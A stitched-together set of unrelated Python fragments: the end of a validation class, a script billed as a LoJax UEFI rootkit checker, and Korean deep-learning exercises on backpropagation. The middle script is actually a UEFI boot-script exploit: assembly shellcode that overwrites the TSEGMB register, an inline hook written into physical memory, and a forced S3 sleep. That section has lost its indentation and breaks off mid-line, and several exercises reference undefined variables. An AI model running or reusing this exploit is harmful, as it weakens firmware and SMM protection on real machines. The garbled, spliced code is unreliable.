            return Predicate(tuple(fuzzy_or_orig(x) for x in obj))
        return Predicate(fuzzy_or_orig(obj))

    def check_group(self, group):
        differences, description = super(RequiredFuzzy, self).check_group(group)
        fuzzy_info = '{0}, fuzzy matching at ratio {1} or greater'
        return differences, fuzzy_info.format(description, self.cutoff)
class RequiredInterval(RequiredPredicate):
    """Require that values are within given interval."""
    def __init__(self, min=None, max=None, show_expected=False):
        left_bounded = min is not None
        right_bounded = max is not None
        if left_bounded and right_bounded:
            if max < min:
                raise ValueError("'max' must not be less than 'min'")
            # Closed interval: min <= element <= max.
            def interval(element):
                try:
                    if element < min:
                        return _make_difference(element, min, show_expected)
                    if element > max:
                        return _make_difference(element, max, show_expected)
                except TypeError:
                    # Element not comparable to the bounds.
                    return Invalid(element)
                return True
            description = 'elements `x` do not satisfy `{0!r} <= x <= {1!r}`'
            description = description.format(min, max)
        elif left_bounded:
            # Lower bound only.
            def interval(element):
                try:
                    if element < min:
                        return _make_difference(element, min, show_expected)
                except TypeError:
                    return Invalid(element)
                return True
            description = 'less than minimum expected value of {0!r}'.format(min)
        elif right_bounded:
            # Upper bound only.
            def interval(element):
                try:
                    if element > max:
                        return _make_difference(element, max, show_expected)
                except TypeError:
                    return Invalid(element)
                return True
            description = 'exceeds maximum expected value of {0!r}'.format(max)
        else:
            raise TypeError("must provide at least one: 'min' or 'max'")
        self._description = description
        # The interval closure is the predicate for the base class.
        super(RequiredInterval, self).__init__(interval, show_expected=show_expected)
| |
# Source: evgind/lojax_uefi_rootkit_checker
#!/usr/bin/env python3
#<EMAIL> V0.1
#This script performs firmware checks for only ProLiant DL180 and ProLiant DL360.
import sys, os, argparse, subprocess, re, pkg_resources, json, contextlib, time
from struct import pack, unpack
# Module name referenced by the firmware checks.
_BaseModule = 'BaseModule'

# 32-bit NASM payload injected via a boot-script DISPATCH hook.  The
# db/dd slots after `call _label` form a data area the shellcode fills
# in at S3 resume: a run counter, the BIOS_CNTL value (PCI 0:1f:0
# offset 0xdc) and the TSEGMB value (PCI 0:0:0 offset 0xb8); if the
# TSEGMB lock bit is clear, a dummy value is written to it.  Inline
# comments are the original Turkish ("degeri" = value, "registerleri
# geri yukle" = restore registers).  The string is assembled at runtime
# and must stay byte-identical.
PAYLOAD = '''
[bits 32]
; save registers
push eax
push edx
push esi
call _label
db 0ffh
dd 0 ; shellcode say
db 0 ; BIOS_CNTL degeri
dd 0 ; TSEGMB degeri
_label:
pop esi
inc esi
inc dword [esi]
cmp byte [esi], 1
jne _end
mov eax, 0x8000f8dc
mov dx, 0xcf8
out dx, eax
mov dx, 0xcfc
in al, dx
mov byte [esi + 4], al
mov eax, 0x800000b8
mov dx, 0xcf8
out dx, eax
mov dx, 0xcfc
in eax, dx
mov dword [esi + 5], eax
and eax, 1
test eax, eax
jnz _end
; bus = 0, dev = 0, func = 0, offset = 0xb8
mov eax, 0x800000b8
mov dx, 0xcf8
out dx, eax
; TSEGMB dummy deger yaz
mov eax, 0xff000001
mov dx, 0xcfc
out dx, eax
_end:
; registerleri geri yukle
pop esi
pop edx
pop eax
'''
def _at(data, off, size, fmt):
    """Unpack a single value of *size* bytes at offset *off* of *data*."""
    field = data[off:off + size]
    (value,) = unpack(fmt, field)
    return value

def byte_at(data, off=0):
    """Unsigned 8-bit integer at *off*."""
    return _at(data, off, 1, 'B')

def word_at(data, off=0):
    """Unsigned 16-bit integer at *off* (native byte order)."""
    return _at(data, off, 2, 'H')

def dword_at(data, off=0):
    """Unsigned 32-bit integer at *off* (native byte order)."""
    return _at(data, off, 4, 'I')

def qword_at(data, off=0):
    """Unsigned 64-bit integer at *off* (native byte order)."""
    return _at(data, off, 8, 'Q')
class UefiParser(object):
    """Walk a saved UEFI S3 boot-script table and log each entry.

    Supports both the EDK layout (signature byte + fixed header) and the
    Intel layout; write and dispatch opcodes are decoded and forwarded
    to the corresponding *_proc/log methods, which subclasses may
    override (see process_dispatch in CustomUefiParser below).

    NOTE(review): methods call self.log(), which is not defined in this
    class -- presumably provided by a subclass or elsewhere; verify.
    """
    # EDK boot scripts start with this signature byte.
    # NOTE(review): this is a one-character str; parse() compares it with
    # data[0], which is an int when *data* is bytes on Python 3 --
    # confirm whether callers pass str or bytes.
    BOOT_SCRIPT_EDK_SIGN = '\xAA'
    BOOT_SCRIPT_EDK_HEADER_LEN = 0x34
    # Boot-script opcode numbers (EFI_BOOT_SCRIPT_* constants).
    EFI_BOOT_SCRIPT_IO_WRITE_OPCODE = 0x00
    EFI_BOOT_SCRIPT_IO_READ_WRITE_OPCODE = 0x01
    EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE = 0x02
    EFI_BOOT_SCRIPT_MEM_READ_WRITE_OPCODE = 0x03
    EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE = 0x04
    EFI_BOOT_SCRIPT_PCI_CONFIG_READ_WRITE_OPCODE = 0x05
    EFI_BOOT_SCRIPT_SMBUS_EXECUTE_OPCODE = 0x06
    EFI_BOOT_SCRIPT_STALL_OPCODE = 0x07
    EFI_BOOT_SCRIPT_DISPATCH_OPCODE = 0x08
    EFI_BOOT_SCRIPT_MEM_POLL_OPCODE = 0x09
    # Human-readable names indexed by opcode number.
    boot_script_ops = [
        'IO_WRITE',
        'IO_READ_WRITE',
        'MEM_WRITE',
        'MEM_READ_WRITE',
        'PCI_CONFIG_WRITE',
        'PCI_CONFIG_READ_WRITE',
        'SMBUS_EXECUTE',
        'STALL',
        'DISPATCH',
        'EFI_BOOT_SCRIPT_MEM_POLL_OPCODE' ]
    # EFI_BOOT_SCRIPT_WIDTH values (operand widths).
    EfiBootScriptWidthUint8 = 0
    EfiBootScriptWidthUint16 = 1
    EfiBootScriptWidthUint32 = 2
    EfiBootScriptWidthUint64 = 3
    EfiBootScriptWidthFifoUint8 = 4
    EfiBootScriptWidthFifoUint16 = 5
    EfiBootScriptWidthFifoUint32 = 6
    EfiBootScriptWidthFifoUint64 = 7
    EfiBootScriptWidthFillUint8 = 8
    EfiBootScriptWidthFillUint16 = 9
    EfiBootScriptWidthFillUint32 = 10
    EfiBootScriptWidthFillUint64 = 11
    # Human-readable names indexed by width value.
    boot_script_width = [
        'Uint8',
        'Uint16',
        'Uint32',
        'Uint64',
        'FifoUint8',
        'FifoUint16',
        'FifoUint32',
        'FifoUint64',
        'FillUint8',
        'FillUint16',
        'FillUint32',
        'FillUint64' ]

    def __init__(self, quiet = False):
        # quiet flag; presumably consulted by the missing log() method.
        self.quiet = quiet

    def value_at(self, data, off, width):
        """Decode one value of the given boot-script *width* at *off*.

        Only the plain Uint8..Uint64 widths are supported; Fifo/Fill
        widths raise.
        """
        if width == self.EfiBootScriptWidthUint8: return byte_at(data, off)
        elif width == self.EfiBootScriptWidthUint16: return word_at(data, off)
        elif width == self.EfiBootScriptWidthUint32: return dword_at(data, off)
        elif width == self.EfiBootScriptWidthUint64: return qword_at(data, off)
        else: raise Exception('Invalid width 0x%x' % width)

    def width_size(self, width):
        """Size in bytes of one value of the given boot-script width."""
        if width == self.EfiBootScriptWidthUint8: return 1
        elif width == self.EfiBootScriptWidthUint16: return 2
        elif width == self.EfiBootScriptWidthUint32: return 4
        elif width == self.EfiBootScriptWidthUint64: return 8
        else: raise Exception('Invalid width 0x%x' % width)

    def memory_write_proc(self, width, addr, count, val):
        """Log a MEM_WRITE entry (override to process it)."""
        self.log(('Width: %s, Addr: 0x%.16x, Count: %d\n' + \
                  'Value: %s\n') % \
                 (self.boot_script_width[width], addr, count, \
                  ', '.join(map(lambda v: hex(v), val))))

    def pci_write(self, width, bus, dev, fun, off, count, val):
        """Log a PCI_CONFIG_WRITE entry (override to process it)."""
        self.log(('Width: %s, Count: %d\n' + \
                  'Bus: 0x%.2x, Device: 0x%.2x, Function: 0x%.2x, Offset: 0x%.2x\n' + \
                  'Value: %s\n') % \
                 (self.boot_script_width[width], count, bus, dev, fun, off, \
                  ', '.join(map(lambda v: hex(v), val))))

    def io_write_proc(self, width, port, count, val):
        """Log an IO_WRITE entry (override to process it)."""
        self.log(('Width: %s, Port: 0x%.4x, Count: %d\n' + \
                  'Value: %s\n') % \
                 (self.boot_script_width[width], port, count, \
                  ', '.join(map(lambda v: hex(v), val))))

    def process_dispatch(self, addr):
        """Log a DISPATCH entry's call address (override to process it)."""
        self.log('Call addr: 0x%.16x' % (addr) + '\n')

    def read_values(self, data, width, count):
        """Read *count* consecutive values of *width* from *data*."""
        values = []
        for i in range(0, count):
            # read single value of given width
            values.append(self.value_at(data, i * self.width_size(width), width))
        return values

    def op_name(self, op):
        """Readable name for opcode *op* (or UNKNOWN_0x.. placeholder)."""
        if op < len(self.boot_script_ops):
            return self.boot_script_ops[op]
        else:
            return 'UNKNOWN_0x%X' % op

    def parse_intel(self, data, boot_script_addr):
        """Parse an Intel-format boot script.

        Each entry header is (num: u32, size: u32, op: u8); 0xff
        terminates the table.
        """
        ptr = 0
        while data:
            num, size, op = unpack('IIB', data[:9])
            if op == 0xff:
                self.log('# End of the boot script at offset 0x%x' % ptr)
                break
            elif op >= len(self.boot_script_ops):
                raise Exception('Invalid op 0x%x' % op)
            self.log('#%d len=%d %s' % (num, size, self.op_name(op)))
            if op == self.EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE:
                width, count = byte_at(data, 9), qword_at(data, 24)
                addr = qword_at(data, 16)
                values = self.read_values(data[32:], width, count)
                self.memory_write_proc(width, addr, count, values)
            elif op == self.EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE:
                width, count = byte_at(data, 9), qword_at(data, 24)
                addr = qword_at(data, 16)
                # Address packs bus/dev/fun/offset into one qword.
                bus, dev, fun, off = (addr >> 24) & 0xff, (addr >> 16) & 0xff, \
                                     (addr >> 8) & 0xff, (addr >> 0) & 0xff
                values = self.read_values(data[32:], width, count)
                self.pci_write(width, bus, dev, fun, off, count, values)
            elif op == self.EFI_BOOT_SCRIPT_IO_WRITE_OPCODE:
                width, count = byte_at(data, 9), qword_at(data, 16)
                port = word_at(data, 10)
                values = self.read_values(data[24:], width, count)
                self.io_write_proc(width, port, count, values)
            elif op == self.EFI_BOOT_SCRIPT_DISPATCH_OPCODE:
                addr = qword_at(data, 16)
                self.process_dispatch(addr)
            else:
                # Other opcodes are skipped by size.
                pass
            data = data[size:]
            ptr += size

    def parse_edk(self, data, boot_script_addr):
        """Parse an EDK-format boot script.

        Each entry header is (op: u8, _: u8, size: u8); 0xff terminates.
        Only DISPATCH entries are decoded; everything else is skipped.
        """
        ptr = num = 0
        while data:
            op, _, size = unpack('BBB', data[:3])
            if op == 0xff:
                self.log('# End of the boot script at offset 0x%x' % ptr)
                break
            if op < len(self.boot_script_ops):
                # NOTE(review): `name` is assigned but never used.
                name = self.boot_script_ops[op]
            self.log('#%d len=%d %s' % (num, size, self.op_name(op)))
            if op == self.EFI_BOOT_SCRIPT_DISPATCH_OPCODE:
                addr = qword_at(data, 3)
                self.process_dispatch(addr)
            else:
                pass
            data = data[size:]
            ptr += size
            num += 1

    def parse(self, data, boot_script_addr):
        """Dispatch to the EDK or Intel parser based on the first byte."""
        if data[0] == self.BOOT_SCRIPT_EDK_SIGN:
            # Parse EDK format (skip signature byte + fixed header).
            self.parse_edk(data[1 + self.BOOT_SCRIPT_EDK_HEADER_LEN:], boot_script_addr)
        else:
            # Parse Intel format.
            self.parse_intel(data, boot_script_addr)
class Uefi_Parser_Table(object):
EFI_VAR_NAME = 'AcpiGlobalVariable'
EFI_VAR_GUID = 'af9ffd67-ec10-488a-9dfc-6cbf5ee22c2e'
JUMP_32_LEN = 5
JUMP_64_LEN = 14
WAKE_AFTER = 10 # saniye
BOOT_SCRIPT_OFFSET = 0x18
BOOT_SCRIPT_MAX_LEN = 0x8000
class CustomUefiParser(UefiParser):
class AddressFound(Exception):
def __init__(self, addr):
self.addr = addr
def process_dispatch(self, addr):
raise self.AddressFound(addr)
def parse(self, data, boot_script_addr):
try:
UefiParser.parse(self, data, \
boot_script_addr = boot_script_addr)
except self.AddressFound as e:
return e.addr
return None
def _efi_var_read(self, name, guid):
data = self._uefi.get_EFI_variable(name, guid, None)
if len(data) == 4:
return dword_at(data)
elif len(data) == 8:
return qword_at(data)
def _mem_read(self, addr, size):
# memory reads by 1000h
read_addr = addr & 0xfffffffffffff000
read_size = size + addr - read_addr
if hasattr(self._memory, 'read_phys_mem'):
data = self._memory.read_phys_mem(read_addr, read_size)
elif hasattr(self._memory, 'read_physical_mem'):
# for older versions
data = self._memory.read_physical_mem(read_addr, read_size)
else:
assert False
return data[addr - read_addr:]
def _mem_write(self, addr, data):
if hasattr(self._memory, 'write_phys_mem'):
self._memory.write_phys_mem(addr, len(data), data)
elif hasattr(self._memory, 'write_physical_mem'):
self._memory.write_physical_mem(addr, len(data), data)
else:
assert False
def _disasm(self, data):
import capstone
dis = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
dis.detail = True
for insn in dis.disasm(data, len(data)):
if insn.group(capstone.CS_GRP_JUMP) or \
insn.group(capstone.CS_GRP_CALL) or \
insn.group(capstone.CS_GRP_RET) or \
insn.group(capstone.CS_GRP_INT) or \
insn.group(capstone.CS_GRP_IRET):
raise Exception('Unable to patch %s instruction at the beginning of the function' % insn.mnemonic)
return insn.size
def _jump_32(self, src, dst):
addr = pack('I', (dst - src - self.JUMP_32_LEN) & 0xffffffff)
return '\xe9' + addr
def _jump_64(self, src, dst):
addr = pack('Q', dst & 0xffffffffffffffff)
return '\xff\x25\x00\x00\x00\x00' + addr
def _find_zero_bytes(self, addr, size):
max_size, page_size = 0, 0x1000
addr = (addr & 0xfffff000) + page_size
while max_size < 1024 * 1024:
if self._mem_read(addr - size, size) == '\0' * size:
addr -= size
return addr
addr += page_size
max_size += page_size
raise Exception('Unable to find unused memory to store payload')
def _hook(self, addr, payload):
hook_size = 0
data = self._mem_read(addr, 0x40)
while hook_size < self.JUMP_32_LEN:
size = self._disasm(data[hook_size:])
hook_size += size
data = data[:hook_size]
buff_size = len(payload) + hook_size + self.JUMP_32_LEN
buff_addr = self._find_zero_bytes(addr, buff_size)
# write payload + original bytes + jump back to hooked function
buff = payload + data + \
self._jump_32(buff_addr + len(payload) + hook_size, \
addr + hook_size)
self._mem_write(buff_addr, buff)
# write 32-bit jump from function to payload
self._mem_write(addr, self._jump_32(addr, buff_addr))
return buff_addr, buff_size, data
def exploit_test(self):
self.logger.start_test('UEFI boot script table vulnerability exploit')
# read ACPI global variable structure data
AcpiGlobalVariable = self._efi_var_read(self.EFI_VAR_NAME, self.EFI_VAR_GUID)
# get bootscript pointer
data = self._mem_read(AcpiGlobalVariable, self.BOOT_SCRIPT_OFFSET + 8)
boot_script = dword_at(data, self.BOOT_SCRIPT_OFFSET)
if boot_script == 0:
raise Exception('Unable to locate boot script table')
data = self._mem_read(boot_script, self.BOOT_SCRIPT_MAX_LEN)
# read and parse boot script
dispatch_addr = self.CustomUefiParser(quiet = True).parse( \
data, boot_script_addr = boot_script)
if dispatch_addr is None:
raise Exception('Unable to locate EFI_BOOT_SCRIPT_DISPATCH_OPCODE')
# compile payload
payload = Asm().compile(PAYLOAD)
# find offset of payload data area
offset = payload.find('\xff' + '\0' * (4 + 1 + 4))
if offset == -1: raise Exception('Invalid payload')
# execute payload as UEFI function handler
ret = self._hook(dispatch_addr, payload)
if ret is not None:
buff_addr, buff_size, old_data = ret
# go to the S3 sleep
time.sleep(3)
os.system('rtcwake -m mem -s %d' % self.WAKE_AFTER)
data = self._mem_read(buff_addr + offset + 1, 4 + 1 | |
# Section header (Korean): NCS problem 1 -- after running the script
# below, the elements of x would have been changed along with out; how
# do we keep x unchanged when re-running the test?
print('====================================================================================================')
print('== NCS 문제 1. 아래의 스크립트를 테스트해보면 x 의 원소가 out 의 원소로 변경되었을 것이다.'
      '다시 테스트할 때 x 의 원소가 out 의 원소로 변경되지 않게 하려면 어떻게 해야하는가?')
print('====================================================================================================\n')
import copy  # NOTE(review): imported but unused; ndarray.copy() is used below.
import numpy as np
x = np.array([[1.0, -0.5], [-2.0, 3.0]])
print(x)
mask = (x <= 0)  # Boolean mask of non-positive entries.
print(mask)
out = x.copy()  # Answer: copy so the masked assignment does not touch x.
print(out)
out[mask] = 0
print(out)
print(x)  # x is unchanged thanks to the copy.
# ■ 5장 목차
# 1. 역전파란 무엇인가?
# 2. 계산 그래프
# - 덧셈 그래프
# - 곱셈 그래프
# - 덧셈 그래프 역전파
# - 곱셈 그래프 역전파
# 3. 파이썬으로 단순한 계층 구현하기
# - 덧셈 계층 (역전파 포함)
# - 곱셈 계층 (역전파 포함)
# - Relu 계층 (역전파 포함)
# - sigmoid 계층 (역전파 포함)
# 4. Affine과 softmax계층 구현
# 5. 배치용 affine계층 구현
# 6. softmax with loss 계층
# 7. 오차역전파법 구현하기
# ■ 역전파란?
#
# 신경망 학습 처리에서 최소화되는 함수의 경사를 효율적으로 계산하기 위한 방법으로 "오류 역전파"가 있다.
#
# 함수의 경사(기울기)를 계산하는 방법
# 1. 수치 미분 <--- 너무 성능이 느림
# 2. 오류 역전파 <--- 성능이 빠르고 간단하다.
#
# * 순전파 vs 역전파
# - 순전파: 입력층 -> 은닉층 -> 출력층
# - 역전파: 출력층 -> 은닉층 -> 입력층
# 오차를 역전파시킨다.
#
# 출력층부터 차례대로 역방향으로 거슬러 올라가 각 층에 있는 노드의 오차를 계산할 수 있다.
# 각 노드의 오차를 계산하면 그 오차를 사용해서 함수의 기울기를 계산할 수 있다.
# "즉, 전파된 오차를 이용하여 가중치를 조정한다. "
# ↓
# 오차 역전파
# ■ 계산 그래프
#
# "순전파와 역전파의 계산 과정을 그래프로 나타내는 방법"
#
# 계산 그래프의 장점? 국소적 계산을 할 수 있다.
# 국소적 계산이란? 전체에 어떤 일이 벌어지던 상관없이 자신과 관계된
# 정보만으로 다음 결과를 출력할 수 있다는 것
#
# 그림 fig 5-4
#
# ■ 왜? 계산 그래프로 푸는가?
# 전체가 아무리 복잡해도 각 노드에서 단순한 계산에 집중하여 문제를 단순화시킬 수 있다.
#
# ■ 실제로 계산 그래프를 사용하는 가장 큰 이유는?
# 역전파를 통해서 미분을 효율적으로 계산할 수 있다.
# ↓
# 사과 값이 '아주 조금' 올랐을 때 '지불금액'이 얼마나 증가하는지를 알고 싶다는 것이다.
# => 지불금액을 사과 값으로 편미분 하면 ㅇ
# ↓
# 사과값이 1원 오르면 최종금액은 2.2원이 오른다.
print('====================================================================================================')
print('== 문제 100. 위에서 만든 곱셈 클래스를 객체화 시켜서 아래의 사과가격의 총 가격을 구하시오.')
print('====================================================================================================\n')
# Inputs for problem 100: apple unit price, quantity and tax multiplier.
apple = 200
apple_num = 5
tax = 1.2
class MulLayer:
    """Multiplication node of a computational graph.

    ``forward`` caches its two operands so that ``backward`` can apply the
    chain rule: d(x*y)/dx = y and d(x*y)/dy = x.
    """

    def __init__(self):
        self.x = None  # left operand cached by the last forward pass
        self.y = None  # right operand cached by the last forward pass

    def forward(self, x, y):
        """Return x * y, caching both operands for the backward pass."""
        self.x = x
        self.y = y
        # Fixed: the original assigned `out = x * y` and then recomputed the
        # product on the return line (dead local + duplicated work).
        return x * y

    def backward(self, dout):
        """Given upstream gradient ``dout``, return (dL/dx, dL/dy)."""
        dx = dout * self.y
        dy = dout * self.x
        return dx, dy
# Problem 100: two chained multiplication nodes, (200 * 5) * 1.2 = 1200.0
apple_layer = MulLayer()
tax_layer = MulLayer()
apple_price = apple_layer.forward(apple, apple_num)  # 200 * 5 = 1000
price = tax_layer.forward(apple_price, tax)          # 1000 * 1.2 = 1200.0
# Fixed: a bare `price` expression at module level has no effect; print the
# result like every other exercise in this file does.
print(price)
# Problem 101: implement the addition layer (defined just below).
print('====================================================================================================')
print('== 문제 101. 덧셈 계층을 파이썬으로 구현하시오!')
print('====================================================================================================\n')
class AddLayer:
    """Addition node of a computational graph.

    Stateless: the local gradient of x + y with respect to either operand
    is exactly 1, so nothing needs to be cached for the backward pass.
    """

    def __init__(self):
        # Nothing to remember between forward and backward.
        pass

    def forward(self, x, y):
        """Return the sum of the two inputs."""
        total = x + y
        return total

    def backward(self, dout):
        """Route the upstream gradient unchanged to both inputs."""
        return dout, dout
print('====================================================================================================')
print('== 문제 102. 사과 2개와 귤 5개를 구입하면 총 가격이 얼마인지 구하시오!')
print('====================================================================================================\n')
# Graph: (200*2) + (300*5) = 1900, then * 1.5 tax -> 2850.0
apple_node = MulLayer()
apple_price = apple_node.forward(200, 2)
orange_node = MulLayer()
orange_price = orange_node.forward(300, 5)
fruit_node = AddLayer()
fruit_price = fruit_node.forward(apple_price, orange_price)
total_node = MulLayer()
total_price = total_node.forward(fruit_price, 1.5)
print(total_price)
print('====================================================================================================')
print('== 문제 106. 문제 105번 역전파를 파이썬으로 구현하시오.')
print('====================================================================================================\n')
# NOTE(review): apple_cnt, mandarin, mandarin_cnt, pear and pear_cnt are not
# assigned anywhere in this part of the file, so the forward pass below
# raises NameError as written — the "problem 105" setup appears to be
# missing; confirm against the original notebook.
mul_apple_layer = MulLayer()
mul_mandarin_layer = MulLayer()
mul_pear_layer = MulLayer()
add_apple_mandarin_layer = AddLayer()
add_all_layer = AddLayer()
mul_tax_layer = MulLayer()
## forward pass
apple_price = mul_apple_layer.forward(apple, apple_cnt)
mandarin_price = mul_mandarin_layer.forward(mandarin, mandarin_cnt)
pear_price = mul_pear_layer.forward(pear, pear_cnt)
apple_mandarin_price = add_apple_mandarin_layer.forward(apple_price, mandarin_price)
all_price = add_all_layer.forward(apple_mandarin_price, pear_price)
price = mul_tax_layer.forward(all_price, tax)
## backward pass (reverse of the forward order)
d_price = 1
d_all_price, d_tax = mul_tax_layer.backward(d_price)  # step 6
d_apple_mandarin_price, d_pear_price = add_all_layer.backward(d_all_price)  # step 5
d_apple_price, d_mandarin_price = add_apple_mandarin_layer.backward(d_apple_mandarin_price)  # step 4
d_apple, d_apple_cnt = mul_apple_layer.backward(d_apple_price)  # step 1
d_mandarin, d_mandarin_cnt = mul_mandarin_layer.backward(d_mandarin_price)  # step 2
d_pear, d_pear_cnt = mul_pear_layer.backward(d_pear_price)  # step 3
print(price)
print(d_apple, d_apple_cnt, d_mandarin, d_mandarin_cnt, d_pear, d_pear_cnt)
# ■ Syntax basics needed before implementing the ReLU layer
import copy  # NOTE(review): unused here; ndarray.copy() below is a method, not this module
import numpy as np
x = np.array([[1.0, -0.5], [-2.0, 3.0]])
print(x)
mask = (x <= 0)  # True where ReLU will clip
print(mask)
out = x.copy()  # copy first so x survives the in-place zeroing
print(out)
out[mask] = 0
print(out)
print(x)  # unchanged
print('====================================================================================================')
print('== 문제 107. ReLU 함수를 파이썬으로 구현하시오!')
print('====================================================================================================\n')
class Relu:
    """ReLU activation layer that caches a clip mask for backprop."""

    def __init__(self):
        # Boolean array marking positions that were clipped (input <= 0).
        self.mask = None

    def forward(self, x):
        """Return x with every non-positive entry replaced by 0."""
        self.mask = np.less_equal(x, 0)
        clipped = x.copy()
        clipped[self.mask] = 0
        return clipped

    def backward(self, dout):
        """Zero the upstream gradient wherever forward clipped.

        Note: modifies ``dout`` in place (same contract as the original).
        """
        dout[self.mask] = 0
        return dout
print('====================================================================================================')
print('== 문제 108. 아래의 x 변수를 생성하고 x 를 Relu 객체의 forward 함수에 넣으면 무엇이 출력되는지 확인하시오.')
print('====================================================================================================\n')
x = np.array([1.0, 5.0, -2.0, 3.0])
relu = Relu()
print(relu.forward(x))  # -> [1. 5. 0. 3.]
import numpy as np  # repeated import; harmless, numpy is already loaded
x = np.array([5, 6])
w = np.array([[2, 4, 4], [6, 3, 5]])
print(np.dot(x, w))  # (2,)·(2,3) -> [46 38 50]
print('====================================================================================================')
print('== 문제 121. 문제 120번의 순전파를 구하는 함수를 forward 란 이름으로 생성하시오!')
print('====================================================================================================\n')
# Affine demo inputs: 2-element input, 2x3 weights, 3-element bias.
x = np.array([1, 2])
w = np.array([[1, 3, 5], [2, 4, 6]])
b = np.array([1, 2, 3])
def forward(x, w, b):
    """Affine forward pass: return the matrix product x·w plus bias b."""
    return np.matmul(x, w) + b
print(forward(x, w, b))  # [1,2]·w + b -> [6 13 20]
print('====================================================================================================')
print('== 문제 122. 문제 121번의 역전파를 구하는 함수를 backward 란 이름으로 생성하시오!')
print('====================================================================================================\n')
# Upstream gradient and inputs as explicit 2-D (row) matrices for backward.
out = np.array([6, 13, 20], ndmin=2)
x = np.array([1, 2], ndmin=2)
w = np.array([[1, 3, 5], [2, 4, 6]])
b = np.array([1, 2, 3])
def backward(x, w, out):
    """Affine backward pass for upstream gradient ``out``.

    Returns the tuple (dx, dw, db): gradient w.r.t. the input, the weight
    matrix, and the bias (bias gradient is the column-wise sum because the
    bias was broadcast-added to every row in the forward pass).
    """
    grad_x = out @ w.T
    grad_w = x.T @ out
    grad_b = out.sum(axis=0)
    return grad_x, grad_w, grad_b
print(backward(x, w, out))  # (dx, dw, db) for the row vectors above
print('====================================================================================================')
print('== 문제 123. 위에서 만든 forward 함수와 backward 함수를 묶어서 class 로 구성하는데 class 이름은 Affine 이라고'
      '해서 생성하시오!')
print('====================================================================================================\n')
class Affine:
    """Affine (fully connected) layer: forward computes x·w + b.

    Fixes relative to the original:
      * ``backward`` used the module-level global ``w`` instead of
        ``self.w``, so every instance silently differentiated against
        whatever ``w`` happened to be in scope at call time;
      * ``db`` summed over *all* axes (``np.sum(out)``); the bias gradient
        must be summed per output unit (axis=0), matching the standalone
        ``backward`` function above and the batch Affine class later in
        this file.
    """

    def __init__(self, w, b):
        self.w = w  # weight matrix, shape (in_features, out_features)
        self.b = b  # bias vector, broadcast-added to every row

    def forward(self, x):
        """Return the affine transform x·w + b."""
        return np.dot(x, self.w) + self.b

    def backward(self, x, out):
        """Return (dx, dw, db) for input ``x`` and upstream gradient ``out``."""
        dx = np.dot(out, self.w.T)  # was: np.dot(out, w.T) — global-w bug
        dw = np.dot(x.T, out)
        db = np.sum(out, axis=0)    # was: np.sum(out) — collapsed to a scalar
        return dx, dw, db
# NOTE(review): check this class's backward conventions against the
# standalone backward() defined above (db: per-column vs collapsed sum) —
# the two disagree as originally written; confirm which is intended.
a = Affine(w, b)
print(a.forward(x))
print(a.backward(x, out))
print('====================================================================================================')
print('== 문제 124. 아래의 2층 신경망의 순전파를 Affine 클래스를 사용해서 출력하시오!')
print('====================================================================================================\n')
# Two affine layers chained: (1,2) -> (1,3) -> (1,2).
x = np.array([1, 2], ndmin=2)
w1 = np.array([[1, 3, 5], [2, 4, 6]])
b1 = np.array([1, 2, 3])
w2 = np.array([[1, 4], [2, 5], [3, 6]])
b2 = np.array([1, 2])
a1 = Affine(w1, b1)
z1 = a1.forward(x)   # [[6 13 20]]
a2 = Affine(w2, b2)
z2 = a2.forward(z1)  # [[93 211]]
print(z2)
print('====================================================================================================')
print('== 문제 125. 아래의 2층 신경망의 역전파를 Affine 클래스를 사용해서 출력하시오!')
print('====================================================================================================\n')
# NOTE(review): x is 1-D here (no ndmin=2), and the layer *output* z2 is fed
# to backward as if it were an upstream gradient — verify the intended
# shapes; as written the matrix products in Affine.backward may not align.
x = np.array([1, 2])
w1 = np.array([[1, 3, 5], [2, 4, 6]])
b1 = np.array([1, 2, 3])
w2 = np.array([[1, 4], [2, 5], [3, 6]])
b2 = np.array([1, 2])
a1 = Affine(w1, b1)
z1 = a1.forward(x)
a2 = Affine(w2, b2)
z2 = a2.forward(z1)
dx2, dw2, db2 = a2.backward(z1, z2)
dx1, dw1, db = a1.backward(x, dx2)
print(dx1, dw1, db)
print('====================================================================================================')
print('== 문제 126. 다시 2층 신경망의 순전파를 구현하는데 은닉층에 활성화 함수로 Relu 함수를 추가해서 구현하시오!')
print('====================================================================================================\n')
x = np.array([1, 2])
w1 = np.array([[1, 3, 5], [2, 4, 6]])
b1 = np.array([1, 2, 3])
w2 = np.array([[1, 4], [2, 5], [3, 6]])
b2 = np.array([1, 2])
a1 = Affine(w1, b1)
z1 = a1.forward(x)   # [6 13 20] — all positive, so ReLU passes it through
h1 = Relu()
z1 = h1.forward(z1)
a2 = Affine(w2, b2)
z2 = a2.forward(z1)  # [ 93 211]
print(z2)
print('====================================================================================================')
print('== 문제 127. Relu 함수가 추가된 상태에서 위의 2층 신경망의 역전파를 구현하시오!')
print('====================================================================================================\n')
x = np.array([1, 2])
w1 = np.array([[1, 3, 5], [2, 4, 6]])
b1 = np.array([1, 2, 3])
w2 = np.array([[1, 4], [2, 5], [3, 6]])
b2 = np.array([1, 2])
a1 = Affine(w1, b1)
z1 = a1.forward(x)
h1 = Relu()
z1 = h1.forward(z1)
a2 = Affine(w2, b2)
z2 = a2.forward(z1)
# NOTE(review): Affine.backward takes (x, out) — calling it with a single
# Relu object raises TypeError (missing argument). The ReLU backward step
# also never runs. This exercise looks unfinished; confirm intent.
a2.backward(h1)
print('====================================================================================================')
print('== 문제 128. 위에서 만든 softmaxWithloss 클래스를 객체화 시켜서 아래의 x (입력값), t(target value) 를 입력해서'
      '순전파 오차율을 확인하시오!')
print('====================================================================================================\n')
# NOTE(review): no code follows problem 128 — the SoftmaxWithLoss class it
# refers to is not defined anywhere in this chunk of the file.
print('====================================================================================================')
print('== 문제 129. 데이터만 mnist 가 아니라 쉽게 하나의 값으로 변경한 코드의 순전파 결과값을 출력하시오!')
print('====================================================================================================\n')
import numpy as np
from collections import OrderedDict
class TwoLayerNet:
    """Toy two-layer network (Affine -> ReLU -> Affine -> SoftmaxWithLoss)
    with hard-coded small weights instead of MNIST data.

    NOTE(review): SoftmaxWithLoss is not defined anywhere in this chunk of
    the file, and Affine/Relu are (re)defined *below* this class — Python
    resolves them at call time, so instantiation order matters; confirm the
    missing SoftmaxWithLoss definition.
    """

    def __init__(self):
        # Initialize weights (fixed toy values, not random)
        self.params = {}
